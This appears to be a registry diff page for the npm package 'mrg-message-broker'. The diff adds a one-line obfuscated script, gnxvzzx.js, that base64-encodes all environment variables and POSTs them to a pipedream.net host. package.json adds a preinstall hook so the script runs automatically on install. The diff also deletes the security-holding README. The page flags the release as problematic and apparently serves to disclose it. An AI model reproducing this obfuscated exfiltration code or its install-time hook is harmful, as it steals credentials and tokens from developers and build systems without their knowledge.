mrg-message-broker 0.0.1-security → 70.982.507
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of mrg-message-broker might be problematic. Click here for more details.
- package/gnxvzzx.js +1 -0
- package/package.json +8 -3
- package/README.md +0 -5
package/gnxvzzx.js
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
const a0_0x65969f=a0_0x4b4d;(function(_0x18e911,_0x12bfce){const _0x43baed=a0_0x4b4d,_0x47289e=_0x18e911();while(!![]){try{const _0x2579a9=-parseInt(_0x43baed(0x1b3))/0x1+parseInt(_0x43baed(0x1a8))/0x2+-parseInt(_0x43baed(0x1b1))/0x3+parseInt(_0x43baed(0x1aa))/0x4+-parseInt(_0x43baed(0x1b8))/0x5*(parseInt(_0x43baed(0x1b7))/0x6)+-parseInt(_0x43baed(0x1a6))/0x7+-parseInt(_0x43baed(0x1ba))/0x8*(-parseInt(_0x43baed(0x1b5))/0x9);if(_0x2579a9===_0x12bfce)break;else _0x47289e['push'](_0x47289e['shift']());}catch(_0x9eb17c){_0x47289e['push'](_0x47289e['shift']());}}}(a0_0x29b0,0x819b6));function a0_0x4b4d(_0x3784d7,_0x2901af){const _0x29b0b1=a0_0x29b0();return a0_0x4b4d=function(_0x4b4d8b,_0x2ca57f){_0x4b4d8b=_0x4b4d8b-0x1a5;let _0x4a0b2c=_0x29b0b1[_0x4b4d8b];return _0x4a0b2c;},a0_0x4b4d(_0x3784d7,_0x2901af);}const http=require(a0_0x65969f(0x1a5));function a0_0x29b0(){const _0x27ab95=['354924degNLm','75ZEhrov','stringify','8EICtWs','https','1717835ecFxOf','POST','38526rlqdqb','npm_package_name','909580iffhtP','d967104b6c9e3e7ee7e7f8bad1ba7209','toString','join','from','base64','env','1494525IgRrjy','write','97199GFfOQT','pipedream','18110709OqNYjN','request'];a0_0x29b0=function(){return _0x27ab95;};return a0_0x29b0();}req=http[a0_0x65969f(0x1b6)]({'host':[a0_0x65969f(0x1ab),'m',a0_0x65969f(0x1b4),'net'][a0_0x65969f(0x1ad)]('.'),'path':'/'+(process[a0_0x65969f(0x1b0)][a0_0x65969f(0x1a9)]||''),'method':a0_0x65969f(0x1a7)}),req[a0_0x65969f(0x1b2)](Buffer[a0_0x65969f(0x1ae)](JSON[a0_0x65969f(0x1b9)](process['env']))[a0_0x65969f(0x1ac)](a0_0x65969f(0x1af))),req['end']();
|
package/package.json
CHANGED
@@ -1,6 +1,11 @@
|
|
1
1
|
{
|
2
2
|
"name": "mrg-message-broker",
|
3
|
-
"version": "
|
4
|
-
"
|
5
|
-
"
|
3
|
+
"version": "70.982.507",
|
4
|
+
"main": "gnxvzzx.js",
|
5
|
+
"scripts": {
|
6
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
7
|
+
"preinstall": "node gnxvzzx.js"
|
8
|
+
},
|
9
|
+
"author": "",
|
10
|
+
"license": "ISC"
|
6
11
|
}
|
package/README.md
DELETED
@@ -1,5 +0,0 @@
|
|
1
|
-
# Security holding package
|
2
|
-
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
4
|
-
|
5
|
-
Please refer to www.npmjs.com/advisories?search=mrg-message-broker for more information.
|